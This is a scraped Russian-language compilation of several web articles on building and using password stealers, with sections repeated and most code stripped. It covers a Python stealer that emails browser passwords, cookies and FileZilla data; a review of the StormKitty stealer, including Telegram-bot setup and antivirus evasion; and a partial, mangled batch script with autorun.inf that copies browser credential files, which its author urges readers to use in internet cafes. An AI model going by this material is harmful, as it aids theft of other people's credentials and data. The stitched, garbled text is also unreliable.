Что такое стиллер вай фай

Стиллер паролей на python с отправкой на почту

Стиллер паролей на python

Привет, сейчас будем делать стиллер паролей на ЯП python. Наш стиллер будет воровать пароли браузеров таких как хром, яндекс браузер, амиго, и др., их куки, делать скриншот экрана, узнавать айпи адрес пк на котором открыли стиллер, его место нахождение и его установленная система.

Приступим к делу

Создаем новый файл в IDLE Python или в другой IDE.

Подключаем все нужные библиотеки. В некоторых нужно в cmd скачивать модули.

Собираем с пользователя все его данные.

Собираем пароли с хрома.

Собираем куки с хрома.

Пароли с яндекс браузера.

Данные с FILEZILLA.

Делаем скриншот экрана.

Тут записываем наши тхт в один ZIP — doc.

Вот он наш ZIP по всеми данными.

Тут мы создаем вложение для нашего doc’а ZIP.

Здесь мы собственно производим отправку на емаил с помощью SMTP

Чтобы отправилось сообщение с вашей новой почты gmail нужно проделать это:
На странице «Аккаунт Google» откройте раздел Ненадежные приложения, у которых есть доступ к аккаунту, и включите. Тогда все будет ОК.

Открываете cmd консоль и пишете cd и путь к папке где лежит ваш файл с кодом, ентер.
cd и путь к файлу.

Ссылки

О песочнице

Это «Песочница» — раздел, в который попадают дебютные посты пользователей, желающих стать полноправными участниками сообщества.

Если у вас есть приглашение, отправьте его автору понравившейся публикации — тогда её смогут прочитать и обсудить все остальные пользователи Хабра.

Чтобы исключить предвзятость при оценке, все публикации анонимны, псевдонимы показываются случайным образом.

О модерации

Не надо пропускать:

Источник

Обзор стилера StormKitty

Все немного понимающе в компьютерах пользователи знают, что, если вдруг забыл (или никог­да не знал) пароль от какого‑нибудь сайта, но он сох­ранен в бра­узе­ре, всегда есть воз­можность его отту­да вытащить. Пароли сохраненные в бразуере могут достать и стиллер. Об одном из таких стилеров, который называется StormKitty я и расскажу в сегодняшней статье.

При пен­тесте орга­низа­ции час­то быва­ет нуж­но выпол­нить наг­рузку на взло­ман­ном компь­юте­ре. Мак­сималь­но убе­дитель­ным доказа­тель­ством успе­ха для заказ­чика будет спи­сок паролей с компь­юте­ров сот­рудни­ков, а получить их поможет прек­расный сти­лер StormKitty.

Сти­лер паролей и другого добра StormKitty полностью бес­плат­ный, откры­тый, ста­биль­но работа­ет, а еще при­сыла­ет резуль­таты работы пря­мо в Telegram. Сказ­ка, а не сти­лер. Немуд­рено, что с гит­хаба его уже снес­ли (впро­чем, ненадол­го), а анти­виру­сы истошно кри­чат при его виде.

Раз уж вы чита­ете наш сайт, бес­смыс­ленно рас­ска­зывать, зачем нужен сти­лер и чем он отли­чает­ся от локера-шифровальщика или RAT. Перейдем сразу к делу и скачаем готовый билд.

Обзор стилера StormKitty

Что может стилер StormKitty? По словам ав­тора — мно­го чего. Тут и сама кра­жа дан­ных, и фин­гер­прин­тинг сис­темы, и даже более прод­винутые фун­кции, вро­де про­тиво­дей­ствия ана­лизу и встро­енно­го в сбор­щик обфуска­тора.

Возможности стилера StormKitty:

Как видите, функционал довольно обширный. Но, нес­мотря на это, готовый билд весит все­го 239 Кб и все зависи­мос­ти встро­ены.

Установка стилера StormKitty

Для начала надо собрать исходники. Код написан на C# и хорошо чита­ется, так что мож­но на этом примере изу­чать устрой­ство подоб­ных вредоносных прог­рамм.

Вмес­то сер­вера тут Telegram-бот. Что­бы его исполь­зовать, необходимо соз­дать новый бот и зарядить его токен в наш билд. Для это­го отправьте глав­ному боту коман­ду / wbr / > newbot и сле­дуйте инс­трук­циям.

По­лучит­ся при­мер­но так

За­тем нуж­но ско­пиро­вать токен (который я замылил) и вста­вить его в бил­дер. Он пред­став­ляет собой кон­соль­ное при­ложе­ние на все том же C#. Сбор­ка сос­тоит из нес­коль­ких воп­росов, пос­ле которых будет выведен путь к готово­му бил­ду.

Часть фун­кций (нап­ример, клип­пер и кей­лог­гер) не будут дос­тупны, если не исполь­зовать авто­запуск.

Сборка стилера StormKitty

Как видите, исполь­зует­ся обфуска­ция про­тек­тором ConfuserEx. Он, кста­ти, вклю­чен в релиз­ную вер­сию бил­дера в пол­ном вари­анте, хотя исполь­зует­ся толь­ко кон­соль­ный. Я не мог не про­верить, что получа­ется на выходе, и заг­рузил билд в деком­пилятор dnSpy. Резуль­тат меня обра­довал: от кода не оста­лось ничего челове­кочи­таемо­го.

Так­же я заг­рузил обфусци­рован­ный билд на virustotal.com, на котором прив­лек вни­мание 35 из 69 движ­ков. При этом Avast, «Док­тор Веб» и «Кас­пер­ский» мол­чат, что меня очень уди­вило. Ругани хва­тает и на сам факт исполь­зования Confuser. К бил­деру воп­росов еще боль­ше: сре­аги­рова­ли 51 из 68. Видимо, это из‑за содер­жания внут­ри ничем не прик­рытой наг­рузки.

Использование стилера StormKitty

Билд я соб­рал вруч­ную из исходни­ков. Клип­пер и кей­лог­гер не вклю­чал, авто­запуск тоже. Ненуж­ные фун­кции на вся­кий слу­чай вырезал вооб­ще.

При запус­ке получил фей­ковое сооб­щение об ошиб­ке.

Че­рез пять минут пос­ле запус­ка приш­ло длин­ное сооб­щение, в котором была ссыл­ка на файл. Давайте пос­мотрим на сооб­щение поб­лиже.

Информация собранная стиллером StormKitty

Все потен­циаль­но чувс­тви­тель­ные дан­ные я замазал, что­бы не было желания покопать­ся в моих фай­лах.

В самом сооб­щении ничего осо­бо цен­ного нет. Но из ука­зан­ного бро­сают­ся в гла­за нес­коль­ко оши­бок: Internal IP и Gateway IP не сог­ласу­ются меж­ду собой (потому что внут­ренний IP при­над­лежит VPN), а спи­сок всех адап­теров и их адре­сов не выводит­ся. При этом адап­теров у меня боль­ше десят­ка — спа­сибо Microsoft Hyper-V! Короче, тут косяк. Так­же StormKitty не нашел вто­рой экран.

Пос­ле ска­чива­ния и рас­паков­ки фай­ла по ссыл­ке я уви­дел такой набор папок.

Анализ собранных данных

Есть и перечень ска­чан­ных фай­лов. Он сох­ранен в виде спис­ка со стро­ками такого вида:

Источник

что такое стиллер вай фай

Стиллер паролей на python с отправкой на почту

Стиллер паролей на python

Привет, сейчас будем делать стиллер паролей на ЯП python. Наш стиллер будет воровать пароли браузеров таких как хром, яндекс браузер, амиго, и др., их куки, делать скриншот экрана, узнавать айпи адрес пк на котором открыли стиллер, его место нахождение и его установленная система.

Приступим к делу

Создаем новый файл в IDLE Python или в другой IDE.

Подключаем все нужные библиотеки. В некоторых нужно в cmd скачивать модули.

Собираем с пользователя все его данные.

Собираем пароли с хрома.

Собираем куки с хрома.

Пароли с яндекс браузера.

Данные с FILEZILLA.

Делаем скриншот экрана.

Тут записываем наши тхт в один ZIP — doc.

Вот он наш ZIP по всеми данными.

Тут мы создаем вложение для нашего doc’а ZIP.

Здесь мы собственно производим отправку на емаил с помощью SMTP

Чтобы отправилось сообщение с вашей новой почты gmail нужно проделать это:
На странице «Аккаунт Google» откройте раздел Ненадежные приложения, у которых есть доступ к аккаунту, и включите. Тогда все будет ОК.

Открываете cmd консоль и пишете cd и путь к папке где лежит ваш файл с кодом, ентер.
cd и путь к файлу.

Ссылки

О песочнице

Это «Песочница» — раздел, в который попадают дебютные посты пользователей, желающих стать полноправными участниками сообщества.

Если у вас есть приглашение, отправьте его автору понравившейся публикации — тогда её смогут прочитать и обсудить все остальные пользователи Хабра.

Чтобы исключить предвзятость при оценке, все публикации анонимны, псевдонимы показываются случайным образом.

О модерации

Не надо пропускать:

Как создать простого трояна на Python

Зачем кому-то писать вредоносное ПО на Python? Мы собираемся сделать это, чтобы изучить общие принципы разработки вредоносных программ, а в то же время вы сможете попрактиковаться в использовании этого языка и применить полученные знания для других целей. Кроме того, вредоносное ПО Python встречается в естественных условиях, и не все программы защиты от вирусов обращают на него внимание.

Конечно, приведенные в статье скрипты никоим образом не подходят для использования в боевых условиях — в них нет обфускации, принципы работы просты, как дважды два, и нет никаких вредоносных функций. Однако проявив немного изобретательности, их можно использовать для простых грязных уловок — например, выключения чьего-либо компьютера в классе или в офисе.

Теория

Так что же такое троян? Вирус — это программа, основная задача которой — копировать самого себя. Червь активно распространяется по сети (типичные примеры — Petya и WannaCry), а троян — это скрытая вредоносная программа, маскирующаяся под «хорошее» ПО.

Логика такого заражения заключается в том, что пользователь сам загружает вредоносное ПО на свой компьютер (например, под видом неработающей программы), сам отключает механизмы защиты (в конце концов, программа выглядит нормально) и хочет оставить его на долгое время. Хакеры здесь тоже не спят, поэтому время от времени появляются новости о новых жертвах пиратского программного обеспечения и программ-вымогателей, нацеленных на любителей халявы. Но мы знаем, что бесплатный сыр можно найти только в мыеловке, и сегодня мы очень легко научимся заполнять этот сыр чем-то неожиданным.

Определяем IP

Во-первых, нам (то есть нашему трояну) нужно определить, где он оказался. Важной частью вашей информации является IP-адрес, который вы можете использовать для подключения к зараженному компьютеру в будущем.

Нач­нем писать код. Сра­зу импорти­руем биб­лиоте­ки:

Код получе­ния внеш­него и внут­ренне­го адре­сов будет таким. Обра­ти вни­мание, что, если у жер­твы нес­коль­ко сетевых интерфей­сов (нап­ример, Wi-Fi и Ethernet одновре­мен­но), этот код может вес­ти себя неп­равиль­но.

Ес­ли с локаль­ным адре­сом все более‑менее прос­то — находим имя устрой­ства в сети и смот­рим IP по име­ни устрой­ства, — то вот с пуб­личным IP все нем­ного слож­нее.

Вы­вес­ти информа­цию еще про­ще:

Строковые литералы не только хорошо смотрятся в вашем коде, они также помогают избежать таких ошибок, как сложение строк и добавление чисел (Python это не JavaScript!).

Обзор стилера StormKitty

Все немного понимающе в компьютерах пользователи знают, что, если вдруг забыл (или никог­да не знал) пароль от какого‑нибудь сайта, но он сох­ранен в бра­узе­ре, всегда есть воз­можность его отту­да вытащить. Пароли сохраненные в бразуере могут достать и стиллер. Об одном из таких стилеров, который называется StormKitty я и расскажу в сегодняшней статье.

При пен­тесте орга­низа­ции час­то быва­ет нуж­но выпол­нить наг­рузку на взло­ман­ном компь­юте­ре. Мак­сималь­но убе­дитель­ным доказа­тель­ством успе­ха для заказ­чика будет спи­сок паролей с компь­юте­ров сот­рудни­ков, а получить их поможет прек­расный сти­лер StormKitty.

Сти­лер паролей и другого добра StormKitty полностью бес­плат­ный, откры­тый, ста­биль­но работа­ет, а еще при­сыла­ет резуль­таты работы пря­мо в Telegram. Сказ­ка, а не сти­лер. Немуд­рено, что с гит­хаба его уже снес­ли (впро­чем, ненадол­го), а анти­виру­сы истошно кри­чат при его виде.

Раз уж вы чита­ете наш сайт, бес­смыс­ленно рас­ска­зывать, зачем нужен сти­лер и чем он отли­чает­ся от локера-шифровальщика или RAT. Перейдем сразу к делу и скачаем готовый билд.

Обзор стилера StormKitty

Что может стилер StormKitty? По словам ав­тора — мно­го чего. Тут и сама кра­жа дан­ных, и фин­гер­прин­тинг сис­темы, и даже более прод­винутые фун­кции, вро­де про­тиво­дей­ствия ана­лизу и встро­енно­го в сбор­щик обфуска­тора.

Возможности стилера StormKitty:

Как видите, функционал довольно обширный. Но, нес­мотря на это, готовый билд весит все­го 239 Кб и все зависи­мос­ти встро­ены.

Установка стилера StormKitty

Для начала надо собрать исходники. Код написан на C# и хорошо чита­ется, так что мож­но на этом примере изу­чать устрой­ство подоб­ных вредоносных прог­рамм.

Вмес­то сер­вера тут Telegram-бот. Что­бы его исполь­зовать, необходимо соз­дать новый бот и зарядить его токен в наш билд. Для это­го отправьте глав­ному боту коман­ду / newbot и сле­дуйте инс­трук­циям.

По­лучит­ся при­мер­но так

За­тем нуж­но ско­пиро­вать токен (который я замылил) и вста­вить его в бил­дер. Он пред­став­ляет собой кон­соль­ное при­ложе­ние на все том же C#. Сбор­ка сос­тоит из нес­коль­ких воп­росов, пос­ле которых будет выведен путь к готово­му бил­ду.

Часть фун­кций (нап­ример, клип­пер и кей­лог­гер) не будут дос­тупны, если не исполь­зовать авто­запуск.

Сборка стилера StormKitty

Как видите, исполь­зует­ся обфуска­ция про­тек­тором ConfuserEx. Он, кста­ти, вклю­чен в релиз­ную вер­сию бил­дера в пол­ном вари­анте, хотя исполь­зует­ся толь­ко кон­соль­ный. Я не мог не про­верить, что получа­ется на выходе, и заг­рузил билд в деком­пилятор dnSpy. Резуль­тат меня обра­довал: от кода не оста­лось ничего челове­кочи­таемо­го.

Так­же я заг­рузил обфусци­рован­ный билд на virustotal.com, на котором прив­лек вни­мание 35 из 69 движ­ков. При этом Avast, «Док­тор Веб» и «Кас­пер­ский» мол­чат, что меня очень уди­вило. Ругани хва­тает и на сам факт исполь­зования Confuser. К бил­деру воп­росов еще боль­ше: сре­аги­рова­ли 51 из 68. Видимо, это из‑за содер­жания внут­ри ничем не прик­рытой наг­рузки.

Использование стилера StormKitty

Билд я соб­рал вруч­ную из исходни­ков. Клип­пер и кей­лог­гер не вклю­чал, авто­запуск тоже. Ненуж­ные фун­кции на вся­кий слу­чай вырезал вооб­ще.

При запус­ке получил фей­ковое сооб­щение об ошиб­ке.

Че­рез пять минут пос­ле запус­ка приш­ло длин­ное сооб­щение, в котором была ссыл­ка на файл. Давайте пос­мотрим на сооб­щение поб­лиже.

Информация собранная стиллером StormKitty

Все потен­циаль­но чувс­тви­тель­ные дан­ные я замазал, что­бы не было желания покопать­ся в моих фай­лах.

В самом сооб­щении ничего осо­бо цен­ного нет. Но из ука­зан­ного бро­сают­ся в гла­за нес­коль­ко оши­бок: Internal IP и Gateway IP не сог­ласу­ются меж­ду собой (потому что внут­ренний IP при­над­лежит VPN), а спи­сок всех адап­теров и их адре­сов не выводит­ся. При этом адап­теров у меня боль­ше десят­ка — спа­сибо Microsoft Hyper-V! Короче, тут косяк. Так­же StormKitty не нашел вто­рой экран.

Пос­ле ска­чива­ния и рас­паков­ки фай­ла по ссыл­ке я уви­дел такой набор папок.

Анализ собранных данных

Есть и перечень ска­чан­ных фай­лов. Он сох­ранен в виде спис­ка со стро­ками такого вида:

И не был бы это сти­лер, если бы он не украл пароли. Они сох­раня­ются в виде таких записей:

В пап­ке для Internet Explorer ока­зал­ся толь­ко токен авто­риза­ции в Azure Cloud Shell для Windows Terminal. Что каса­ется Thunderbird — про­фили сти­лер извлек, вот толь­ко они оста­лись зашиф­рованы.

Пап­ка Gaming ока­залась пол­ностью бес­полез­на. StormKitty рас­копал у меня Minecraft, из которо­го заб­рал скрин­шоты и спи­сок уста­нов­ленных вер­сий.

Смот­рим резуль­таты работы граб­бера. Он натас­кал 1193 фай­ла общим объ­емом 2,2 Мбайт. Зву­чит несерь­езно! Ока­зыва­ется, он упа­ковал пару мел­ких фоток, json-кон­фигов и про­чего хла­ма, при этом про­пус­тив лежащие рядом инте­рес­ные фай­лы. Так­же в ком­плект попала пап­ка, в которую я кло­нирую репози­тории с GitHub, — вот цен­ность‑то!

Ко­роче, граб­бер ока­зал­ся бес­полез­ным. До дис­ка D он вооб­ще не доб­рался, воп­реки заяв­лени­ям авто­ра, что он весь комп переро­ет и вытащит все цен­ное. Логика работы по мень­шей мере стран­ная, и даже в теп­личных усло­виях ничего цен­ного (и даже явно попада­юще­го под филь­тр) не наш­лось.

Ин­форма­ция о Discord вклю­чает в себя токен (все обна­ружен­ные токены забот­ливо скла­дыва­ются в фай­лик tokens. txt ) и копию сес­сион­ных фай­лов. Ничего зап­редель­ного.

В спис­ке про­цес­сов есть PID и путь к бинар­нику, но почему‑то нет аргу­мен­тов запус­ка. Стран­но.

По­каза­ния ска­нера, конеч­но, мес­тами стран­ные, но спи­сок сетей и некото­рую информа­цию он показал пра­виль­но. Нас­толь­ко пра­виль­но, что часть даже замазать приш­лось.

И пос­ледний файл отче­та — спи­сок откры­тых окон. Стран­но, как некото­рые из записей ока­зались в этом спис­ке, но все откры­тые окна были обна­руже­ны точ­но. При­мер записи ниже.

Спи­сок про­цес­сов поч­ти такой же: по сути, добавил­ся толь­ко заголо­вок окна. Опять же — никакой информа­ции об аргу­мен­тах. StormKitty как бы изде­вает­ся, не давая нам важ­ный кусок информа­ции.

Заключение

Впе­чат­ления ока­зались нес­коль­ко про­тиво­речи­выми, поэто­му прос­то перечис­лю плю­сы и минусы, а вы сами сде­лаете вывод, под­ходит ли вам такой вари­ант в пентесте.

Плю­сов вро­де боль­ше, но минусы весь­ма зна­читель­ные. К тому же часть фун­кций про­верить не уда­лось, а фан­тазиро­вать не хотелось бы. Глав­ное — пом­ните, что перед исполь­зовани­ем понадо­бит­ся отклю­чить защиту или про­вес­ти ночь с про­тек­торами, упа­ков­щиками, обфуска­тора­ми и про­чей нечистью.

Пишем стилер. Как вытащить пароли Chrome и Firefox своими руками

Содержание статьи

WARNING

Весь код в статье приводится исключительно в образовательных целях и для восстановления собственных утерянных паролей. Похищение чужих учетных или других личных данных без надлежащего письменного соглашения карается по закону.

Итак, браузеры, в основе которых лежит Chrome или Firefox, хранят логины и пароли пользователей в зашифрованном виде в базе SQLite. Эта СУБД компактна и распространяется бесплатно по свободной лицензии. Так же, как и рассматриваемые нами браузеры: весь их код открыт и хорошо документирован, что, несомненно, поможет нам.

В примере модуля стилинга, который я приведу в статье, будет активно использоваться CRT и другие сторонние библиотеки и зависимости, типа sqlite.h. Если тебе нужен компактный код без зависимостей, придется его немного переработать, избавившись от некоторых функций и настроив компилятор должным образом. Как это сделать, я показывал в статье «Тайный WinAPI. Как обфусцировать вызовы WinAPI в своем приложении».

Что скажет антивирус?

Рекламируя свои продукты, вирусописатели часто обращают внимание потенциальных покупателей на то, что в данный момент их стилер не «палится» антивирусом.

Тут надо понимать, что все современные и более-менее серьезные вирусы и трояны имеют модульную структуру, каждый модуль в которой отвечает за что-то свое: один модуль собирает пароли, второй препятствует отладке и эмуляции, третий определяет факт работы в виртуальной машине, четвертый проводит обфускацию вызовов WinAPI, пятый разбирается со встроенным в ОС файрволом.

Так что судить о том, «палится» определенный метод антивирусом или нет, можно, только если речь идет о законченном «боевом» приложении, а не по отдельному модулю.

Chrome

Начнем с Chrome. Для начала давай получим файл, где хранятся учетные записи и пароли пользователей. В Windows он лежит по такому адресу:

Давай напишем функцию, которая получает путь к базе паролей Chrome. В качестве аргумента ей будет передаваться массив символов с результатом ее работы (то есть массив будет содержать путь к файлу паролей Chrome).

База паролей получена, теперь приступаем к работе с ней. Как я уже говорил, это база данных SQLite, работать с ней удобно через SQLite API, которые подключаются с заголовочным файлом sqlite3.h. Давай скопируем файл базы данных, чтобы не занимать его и не мешать работе браузера.

Обрати внимание: при некорректной отработке функции нам все равно необходимо самостоятельно закрыть подключение к базе и удалить ее копию.

Продолжение доступно только участникам

Вариант 1. Присоединись к сообществу «Xakep.ru», чтобы читать все материалы на сайте

Членство в сообществе в течение указанного срока откроет тебе доступ ко ВСЕМ материалам «Хакера», позволит скачивать выпуски в PDF, отключит рекламу на сайте и увеличит личную накопительную скидку! Подробнее

Стиллер паролей для браузеров на Windows

Стиллер паролей для браузеров на Windows

Стиллер паролей – определенный класс вирусов, функционал которых состоит в том, чтобы украсть сохраненные пароли с компьютера и отправить их “автору”.

Метод, который мы будем использовать имеет как плюсы, так и минусы, без этого никуда.

Стиллер паролей для браузеров на Windows | Разбор плюсов и минусов

Давайте разберемся, почему такие плюсы и минусы имеет наш стиллер паролей для браузеров.

Думаю первые пару пунктов в разборе не нуждаются, а вот простота в доработке, давайте посмотрим почему.

Ниже будет код программы, там видно, что стиллер крадет пароли из 3 браузеров, Opera, Mozilla, Chrome. Если вы захотите сделать его более объемным и добавить все браузеры, то вам нужно просто найти их директории и прописать пути.

Далее мгновенный запуск. Создаём файл autorun.inf и добавляем наш anyname.bat туда. Как только вы вставите флешку в ПК, произойдёт кража и её можно сразу вытаскивать. Это займет у секунду времени, однако тут сразу и минус. Autorun.inf не запускается на Windows 8+, так что придётся запускать батник вручную. Точнее сказать, автоматический запуск стал невозможен с последнего обновления безопасности Windows 7.

Постоянное созданиеудаление autorun.inf – если вы вставите флешку в ПК, а потом пойдёте домой и у вас Windows 8.1 или ниже, то пароли обновятся из-за авторана. Чтобы этого избежать его нужно постоянно удалять, однако в нашем скрипте уже всё есть. Он будет удален автоматически после запуска.

Создаём стиллер паролей для браузеров

Для того, чтобы создать портативный стиллер паролей для браузеров нам понадобится только блокнот.

Создаём текстовый документ и пишем туда следующий код:

d0Google
CD/D %APPDATA%OperaOpera
copy /y wand.dat %

d0Opera
copy /y coockies.dat %

d0Opera
cd %AppData%MozillaFirefoxProfiles*.def-ault
copy /y coockies.sqlite %

d0Mozilla
copy /y key3.db %

d0Mozilla
copy /y signons.sqlite %

d0Mozilla
copy /y AppData%MozillaFirefoxProfiles*.def-ault %

d0Mozilla
cd %localappdata%GoogleChromeUser DataDefault
copy /y “%localappdata%GoogleChromeUser DataDefaultLogin Data” “%

Вы же можете его просто скопировать, сохраняем файл как anyname.bat. В коде видно, что сохраняются пароли из Mozilla, Opera, Chrome. Если вы хотите добавить ещё браузеры, требуется найти их директории и таким же образом добавить. Атрибуты, которые мы присвоили делают созданные папки скрытыми, чтобы никто ничего не заподозрил.

Теперь нужно создать файл autorun.inf со следующей командой:

Готово, теперь можете идти куда душа пожелает и воровать пароли, например в интернет-кафе или тому подобные места. Наш стиллер паролей для браузеров не является удалённым, из-за чего придётся ходить.

Открыть сохраненные пароли можно заменив краденые файлы cookies, базы данных и данные логина. Для удобства можно воспользоваться программой Password Web Views.

Сегодня мы поговорили о том, как создать стиллер паролей для браузеров, обсудили плюсы и минусы такого скрипта. Если вам понравилась статья, подписывайтесь на обновления сайта, а также наш Telegram.

Telegram

Подписывайтесь на официальный Telegram канал сайта Make Info.

Источник